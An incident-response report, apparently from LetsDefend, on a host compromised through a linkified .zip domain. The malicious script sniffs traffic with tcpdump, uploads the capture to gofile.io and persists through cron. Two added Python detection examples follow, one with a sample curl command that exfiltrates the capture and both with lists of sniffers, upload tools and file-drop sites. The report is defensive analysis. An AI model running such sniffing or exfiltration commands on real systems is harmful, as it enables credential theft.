Erbol Cat 2021

The incident responder received an alert about suspicious activity on a Linux system named "Billy". After verifying the alert by analyzing logs and the suspicious file, it was determined to be a true positive. The investigation found that Billy was initially compromised after clicking a malicious link in an email. This led to the download and execution of a script that captured network traffic and ensured persistence by adding itself to the crontab. No evidence of privilege escalation was found.

Investigate Phishing zip Domain As Incident Responder

TABLE OF CONTENTS

3 ALERT
4 VERIFY
7 ANALYSIS - INITIAL ACCESS
12 PERSISTENCE
14 PRIVILEGE ESCALATION
14 CREDENTIAL ACCESS
18 CONTAINMENT
19 SUMMARY
20 LESSON LEARNED
21 MITRE ATT&CK

AUTHOR: BERKAY SOYLU


letsdefend.io

ALERT
Based on the information in the alert, suspicious commands were executed on
a Linux system named "Billy" with the IP address 172.16.17.193. The alert was
triggered by the SOC198 rule, Network Sniffer Detected.

The L1 analyst observed that the suspicious command was run from a shell
script located at:
"/home/billy/programs/microsoft-office.sh"

The device action is marked as "allowed", indicating that the endpoint took
no action to prevent or block the execution of the file.

Adversaries often give their files legitimate-looking names to disguise them;
here a script is named after Microsoft Office.

The trigger reason points to potential network sniffing activity through
tools such as tshark or tcpdump. As noted by the L1 analyst, Billy visited a
website, and some of Billy's credentials were accessed after the incident.

VERIFY
As an incident responder, one of the first steps we take to verify the alert and
determine whether it is a false positive or a true positive incident is to
analyze the logs collected from the host by our security products.

A first step is to look up the hash of the suspicious file on online threat
intelligence platforms such as VirusTotal, Hybrid Analysis and MalwareBazaar.

According to VirusTotal, none of the 58 antivirus engines flagged the file as
malicious. However, the "Code Insight" section warns about possible malicious
use of the script, such as capturing network traffic for surveillance or
stealing sensitive information.

VirusTotal Code Insight analyzes potentially harmful files to explain their
(malicious) behavior, which helps identify which of them pose actual threats.

Code Insight revealed that the shell script contains suspicious functionality,
namely capturing network traffic and uploading the resulting pcap to gofile.io.
Since the file also triggered our network sniffer rule, it is possible that the
script is acting as spyware and a trojan. A clean antivirus verdict on a plain
shell script is weak evidence either way: the script calls only legitimate
system tools, so signature engines have little to match on.

We can proceed with connecting to the host machine for further analysis.
This can easily be done from the Endpoint Security tab by searching for the
hostname or IP address and clicking the “Connect” button.

The alert details place the suspicious file in the programs folder. When we
check the related path on the host, the file still exists.

We can use the "sha256sum" command to compute the hash of the file and
cross-check it against the hash given in the alert details.

The hashes match, so we have identified the file and verified that it is the
one referenced in the alert.

Now that we strongly suspect the file is malicious, the next step is to
investigate whether it has been executed on the host system. To do this, we
can check the Process List from the Endpoint Security tab to see if the file
has been run. Looking at running processes is a quick and straightforward
method for identifying any execution trace of the file.

The process list shows that the script was run via sudo from Billy's bash
shell. This proves that the microsoft-office.sh file has been executed on the
system, and as root.

Based on our analysis, we have confirmed that the alert is a true positive
(TP) and that the malware, labeled "Trojan-Spyware", has been executed on the
system. This incident warrants further investigation and an appropriate
response.

ANALYSIS
Initial Access

The presence of malicious files on the computer should prompt us to
determine the attacker's initial access. It is crucial to establish how the
attacker was able to gain unauthorized access to the system.

To begin, we review all the logs gathered from our security products and
cross-reference them with the information from the alert page. The alert
creation time is the key reference point for the timeline.

On the Email Security tab, we can filter on the username to see which
emails Billy received or sent.

Bella sent an email to Billy on May 17 at 08:42 AM. In the email, Bella
contacts Billy regarding the installation of the Microsoft Office suite and
instructs Billy to download the zip file she sends. The email carries an
attachment named microsoft-office[.]zip.

Although this email may appear suspicious, downloading and analyzing the
attached file shows that the attachment is different from the file that
triggered the alarm.

The attachment is in fact a legitimately signed Microsoft document, and it
is flagged as benign on VirusTotal.

Upon careful analysis of the email, it becomes evident that the plain text
"Microsoft-Office[.]zip" was automatically converted into a clickable link
because of the newly released .zip top-level domain (TLD): the email client
recognizes "something.zip" as a hostname and renders it as a hyperlink, so a
filename typed in the body looks like a link the sender deliberately placed.

If a threat actor registers a .zip domain with the same name as a linkified
filename, a recipient may visit the attacker's site and fall for a phishing
page or download malware, believing the URL is safe because it came from a
trusted sender. The recipient never receives the attacker's file as an
attachment, so attachment scanning on the mail gateway does not see it.
Further details can be found at:
https://www.bleepingcomputer.com/news/security/new-zip-domains-spark-debate-among-cybersecurity-experts/
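The linkification problem described above, as an added Python example that is not part of the original report: a routine a mail-filtering or triage pipeline could run over a message body to flag bare filenames that a client would turn into a link to a file-extension TLD, while telling them apart from URLs the sender typed on purpose and from filenames that are merely the path of some other URL. The TLD set, the sample message text and the Candidate structure are assumptions of this example (.zip and .mov are real TLDs; the rest of the policy is yours to set).

```python
import re
from dataclasses import dataclass
from typing import List

# TLDs that double as common file extensions. ".zip" and ".mov" were opened for
# general registration in May 2023 (the case discussed above); treat the set as an
# assumption to be extended to match your own mail-filtering policy.
FILE_EXTENSION_TLDS = {"zip", "mov"}

# A DNS label: 1-63 letters, digits or hyphens, not starting or ending with "-".
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_PATTERN = re.compile(
    r"(?<![A-Za-z0-9.-])"                       # not the tail of a longer token
    r"((?:" + _LABEL + r"\.)+"                   # one or more labels, each followed by "."
    r"(" + "|".join(sorted(FILE_EXTENSION_TLDS)) + r"))"
    r"(?![A-Za-z0-9-])",                         # the TLD ends the token
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Candidate:
    text: str           # the token exactly as it appears in the message body
    hostname: str       # the hostname a linkifier would send the reader to
    explicit_url: bool  # True if the sender wrote a scheme ("https://") before it


def find_linkifiable_filenames(body: str) -> List[Candidate]:
    """Return every token in an email body that a mail client would turn into a
    link to a file-extension TLD, distinguishing bare filenames from real URLs."""
    found = []
    for m in _PATTERN.finditer(body):
        before = body[:m.start()]
        if before.endswith("://"):
            explicit = True                      # a URL the sender typed on purpose
        elif before.endswith("/"):
            continue                             # path component of some other URL
        else:
            explicit = False                     # bare "name.zip": the dangerous case
        found.append(Candidate(text=m.group(1), hostname=m.group(1).lower(),
                               explicit_url=explicit))
    return found


def defang(hostname: str) -> str:
    """Write a hostname so that mail and chat clients will not re-linkify it,
    the convention this report uses (microsoft-office[.]zip)."""
    return hostname.replace(".", "[.]")


if __name__ == "__main__":
    # Constructed message text modelled on the email described above.
    sample = ("Hi Billy, please download Microsoft-Office.zip and run the installer. "
              "The release notes are in notes.pdf.")
    for c in find_linkifiable_filenames(sample):
        kind = "explicit URL" if c.explicit_url else "linkified filename"
        print(f"{kind}: {c.text} -> {defang(c.hostname)}")
```

A bare filename hit is the case to act on: the sender never typed a link, so rewriting the token to its defanged form before delivery (or simply flagging the message) removes the click target without touching legitimate URLs.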
On the Endpoint Security "Browser History" tab, we can see that the
microsoft-office[.]zip address was visited on 2023-05-17 09:02:51. The
creation time of the alert corresponds to the visit of this address.

When we checked the URL on online threat intelligence sources, it was
reported as malicious.

Examining the IP addresses contacted in the Network Action tab, we noticed
several suspicious IP addresses that were communicated with during the
relevant time window.

Some of these contacted IP addresses are also identified as malicious.

When we navigate to the Log Management tab and filter on the IP address of
Billy's host, we can view the logs generated during the relevant time.

They confirm that the microsoft-office[.]zip URL resolved to the visited
malicious IP address and, furthermore, that the microsoft-office.sh file,
which caused the alarm on the device, was downloaded through this URL.

Our investigation has therefore revealed that the microsoft-office.sh file
was downloaded from the microsoft-office[.]zip URL to the compromised
system. The initial infection vector was a malicious URL that the user
clicked; the user then downloaded the file and executed it.

We classify the initial compromise as a Drive-by Compromise (T1189), the
technique under which the attackers gained access to the host machine.
Strictly, no browser exploit was involved: the user had to download and run
the script, so the behaviour also maps to User Execution: Malicious File
(T1204.002).

Persistence

Once an attacker gains initial access, they may try to establish persistence
to ensure continued access to the system or network, even if their initial
access is discovered and removed.

Once we have confirmed the presence of the malware, our next step should
be to investigate any persistence established by the attacker.

To fully understand how the threat operates, it is important to analyze the
code within the .sh file. This will show how the malware ensures persistence
on the system, so that all parts of the threat can be removed later.

After analyzing the code, it appears that the script:

- captures network traffic for a duration of 30 seconds using tcpdump;
- uploads the resulting pcap file to gofile.io;
- extracts the link to the uploaded file from the upload response;
- appends the extracted link to a file named "cap.log";
- finally, configures itself to run at boot time by adding the related line
  to the crontab.

This script is likely used for malicious purposes, such as capturing network
traffic for surveillance or to steal sensitive information. In the Endpoint
Security tab, we can also see that the crontab command ran.

The process details confirm that the malicious microsoft-office.sh script
ensures persistence on the host by creating a crontab entry.

When examining the crontabs on Billy's host, we identified the malicious
script.

Based on our analysis, the malware used the Scheduled Task/Job: Cron
technique (T1053.003) to remain persistent on the host machine. Because the
script was run via sudo, the entry should be looked for in root's crontab as
well as Billy's, and in /etc/crontab and /etc/cron.d/.

Privilege Escalation
We reviewed system logs, analyzed running processes, and checked for any
suspicious system changes, but did not find any evidence of attempts to
gain elevated access or escalate privileges. The script ran as root only
because Billy invoked it with sudo, which is Billy's own legitimately granted
right, not an escalation path exploited by the malware.
Based on the analysis, there were no privilege escalation indicators.

Credential Access

As part of our incident response investigation, we should carefully analyze
the system's activity logs for evidence of credential access. This is a
critical area of concern, as the compromise of sensitive credentials can lead
to further data breaches, unauthorized access, and potential financial losses.

To start, we investigate any potential credential access or data collection
by the attacker. We can begin by analyzing the processes spawned by the
malware in the "Endpoint Security" > "Processes" section.

When examining the process logs of the host named Billy, the tcpdump
process record that caused the triggering of the alarm can be observed.

The command tcpdump -w outfile.pcap -G 30 is not inherently dangerous or
malicious. tcpdump is a widely used command-line packet analyzer for
capturing and analyzing network traffic; -w writes the raw packets to a
file, and -G 30 rotates (reopens) the output file every 30 seconds, so
outfile.pcap holds at most 30 seconds of traffic at a time. When used without
proper authorization, however, tcpdump poses a security risk, particularly in
the context of credential access and network sniffing.

If an attacker gains unauthorized access to a system and executes tcpdump,
they can capture network traffic that contains sensitive information such as
usernames, passwords, or other authentication credentials. By analyzing the
captured packets, an attacker may be able to extract and exploit these
credentials. This is one of the "Credential Access" techniques. Note that
capturing packets requires root (or the CAP_NET_RAW capability), which the
script obtained because it was launched via sudo; without that, tcpdump
would have failed.

When accessing the relevant directory on the device, we can observe that
the pcap file has been written there.

When examining the processes running on the host again, we can observe
that the relevant outfile.pcap file was exfiltrated to a site called "gofile" using
the curl command.

For a detailed analysis, we can check Log Management for the logs that are
collected by the network products.

Overall, analyzing the network logs and firewall logs can provide valuable
insights into the behavior of the malware on the host machine, and can
help us determine the scope and impact of the incident.

The raw log shows that the process microsoft-office.sh connected to the
domain store5.gofile.io with a POST request, and the device permitted this
action. This indicates that outfile.pcap was exfiltrated to the gofile.io
website.

The requested URL information from the raw logs is given in the table below:

The cap.log file on the device contains a link corresponding to the
exfiltrated file.

When visiting that link, it can be observed that outfile.pcap has been
exposed publicly on the internet: anyone holding the link can download the
captured traffic.

Based on our analysis, we have identified that the attacker used the
Network Sniffing technique (T1040), with exfiltration over a public
file-sharing web service.
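The chain described in the Persistence and Credential Access sections (tcpdump writing a capture, curl posting it to gofile.io, then crontab) expressed as detection logic over process-creation events, as an added Python example. This is not code from the report or from the LetsDefend platform: the event format, the PIDs, the gofile.io upload path, the way the script invokes crontab and the file-drop domains other than gofile.io are constructed assumptions, as is the interactive tcpdump used as a negative case. The point it adds to the prose is the correlation: each hit is tied back to the script that spawned it, so the three techniques are reported as one chain rather than three unrelated alerts.

```python
import shlex
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Process-creation events as an EDR exports them: constructed for this example to
# mirror the chain described above, not telemetry from the case. The upload path
# and the crontab invocation are assumptions; the report does not show them.
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 3990, "cmd": "sudo /home/billy/programs/microsoft-office.sh"},
    {"pid": 4102, "ppid": 4101, "cmd": "/bin/bash /home/billy/programs/microsoft-office.sh"},
    {"pid": 4110, "ppid": 4102, "cmd": "tcpdump -w outfile.pcap -G 30"},
    {"pid": 4115, "ppid": 4102, "cmd": "curl -F file=@outfile.pcap https://store5.gofile.io/uploadFile"},
    {"pid": 4118, "ppid": 4102, "cmd": "crontab /tmp/cron.txt"},
    # An administrator's interactive look at DNS: same tool, but no script parent,
    # no output file and no upload, so it must not be reported as part of the chain.
    {"pid": 4200, "ppid": 1200, "cmd": "tcpdump -i eth0 -c 10 port 53"},
]

SNIFFERS = {"tcpdump", "tshark", "dumpcap"}
UPLOAD_TOOLS = {"curl", "wget"}
# Options that make curl/wget send a request body or upload a file.
UPLOAD_FLAGS = {"-F", "--form", "-d", "--data", "--data-binary", "-T",
                "--upload-file", "--post-file", "--post-data"}
# Public file-drop services: gofile.io is from the case, the others are an
# illustrative assumption to be replaced with an organisation's own list.
FILE_DROP_DOMAINS = {"gofile.io", "transfer.sh", "file.io"}


@dataclass(frozen=True)
class Finding:
    technique_id: str        # ATT&CK ID: T1040, T1567.002 or T1053.003
    pid: int
    script: Optional[str]    # nearest ancestor that runs a .sh file, if any
    detail: str


def _argv(cmd: str) -> List[str]:
    try:
        return shlex.split(cmd)
    except ValueError:       # unbalanced quotes in the recorded command line
        return cmd.split()


def _script_ancestor(pid: int, by_pid: Dict[int, dict]) -> Optional[str]:
    """Walk up the parent chain; return the first .sh path found on a command line."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        for tok in _argv(by_pid[pid]["cmd"]):
            if tok.endswith(".sh"):
                return tok
        pid = by_pid[pid]["ppid"]
    return None


def _is_file_drop(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in FILE_DROP_DOMAINS)


def detect(events: List[dict]) -> List[Finding]:
    """Apply the three rules to every event and tie each hit to its spawning script."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        argv = _argv(e["cmd"])
        if argv and argv[0].rsplit("/", 1)[-1] == "sudo":   # judge the real program
            argv = argv[1:]
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        script = _script_ancestor(e["pid"], by_pid)
        if prog in SNIFFERS:
            how = "writes capture file" if "-w" in argv else "live capture only"
            findings.append(Finding("T1040", e["pid"], script, f"{prog}: {how}"))
        elif prog in UPLOAD_TOOLS:
            uploads = any(a in UPLOAD_FLAGS for a in argv) or ("-X" in argv and "POST" in argv)
            urls = [a for a in argv if a.startswith(("http://", "https://"))]
            if uploads and any(_is_file_drop(u) for u in urls):
                findings.append(Finding("T1567.002", e["pid"], script, f"{prog} upload to {urls[0]}"))
        elif prog == "crontab" and "-l" not in argv:         # anything but a listing edits cron
            findings.append(Finding("T1053.003", e["pid"], script, e["cmd"]))
    return findings


def summarize(findings: List[Finding]) -> Dict[Optional[str], List[str]]:
    """Group technique IDs by spawning script; the None key holds hits with no script parent."""
    grouped = defaultdict(set)
    for f in findings:
        grouped[f.script].add(f.technique_id)
    return {script: sorted(ids) for script, ids in grouped.items()}


if __name__ == "__main__":
    for script, ids in summarize(detect(SAMPLE_EVENTS)).items():
        print(script or "<no script parent>", "->", ", ".join(ids))
```

Run on the sample, the script is reported with all three technique IDs while the administrator's tcpdump appears alone under no script, which is the distinction an analyst needs when the same tool is legitimately in use on the host. T1567.002 (Exfiltration to Cloud Storage) is added here for the gofile.io upload; the report itself maps only T1040 and Scheduled Task/Job.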

CONTAINMENT
Based on the information gathered during the investigation, the system has
been compromised. To prevent further data loss or unauthorized access, it is
recommended to isolate the system from the network immediately. Because the
exfiltrated capture may contain credentials of any user or service whose
traffic passed through this host, credentials observed in it should be
treated as compromised and rotated.

After containment we can close the alert from the investigation channel.

SUMMARY
The incident was triggered by an alert indicating network sniffing activity.
The alert pointed to suspicious commands executed on a Linux system named
"Billy" with the IP address 172.16.17.193, and was raised by the SOC198 rule,
Network Sniffer Detected.

Our investigation uncovered that the system was initially compromised
through a malicious URL in the form of a Microsoft-Office[.]zip filename.
Without realizing it, the user clicked on this URL within a legitimate email
sent by Bella. The email client treated the filename as a hostname under
the newly released .zip top-level domain (TLD) and rendered it as a
hyperlink, which led the user to the attacker's site and ultimately to a
drive-by compromise.

In terms of persistence, our analysis revealed that the malicious script was
configured to run at boot time by adding itself to the crontab. This
technique, Scheduled Task/Job, allowed the malware to maintain persistence
on the compromised host.

Regarding credential access, we discovered that the script used tcpdump to
capture network traffic for a period of 30 seconds. The captured traffic was
then uploaded to gofile.io, the link to the uploaded file was extracted from
the upload response, and the extracted link was appended to a file named
"cap.log". The attacker employed the Network Sniffing technique (T1040),
enabling them to intercept network traffic containing sensitive information,
including usernames, passwords, and other authentication credentials.
It is important to note that there were no indicators of privilege escalation.

The incident highlights the successful exploitation of a .zip URL and of
network sniffing to collect sensitive data. Immediate actions should be taken
to mitigate the impact, including isolating the affected system, conducting
a thorough analysis of compromised credentials, and implementing additional
security measures to prevent similar incidents in the future.

LESSON LEARNED
Downloading and executing unknown scripts from the internet can be risky
and potentially harmful. It is important to only download files from
trusted sources.

It is important to keep all software up-to-date to reduce the risk of being
vulnerable to known exploits.

Even if links come from trusted sources, it is still necessary to verify
them; here the "link" was never placed by the sender at all, but produced
by the mail client from a filename.

REMEDIATION ACTIONS
Delete the malicious crontab entry.

Delete associated files and folders related to the script from the host
machine.

Isolate the compromised machine from the network to prevent the attacker
from accessing other resources and systems within the organization.

Rotate any credentials that may have been present in the captured traffic.

MITIGATION ACTIONS
Block dangerous, top-abused TLDs from your network (for example at the DNS
resolver or web proxy).

MITRE ATT&CK

ARTIFACTS
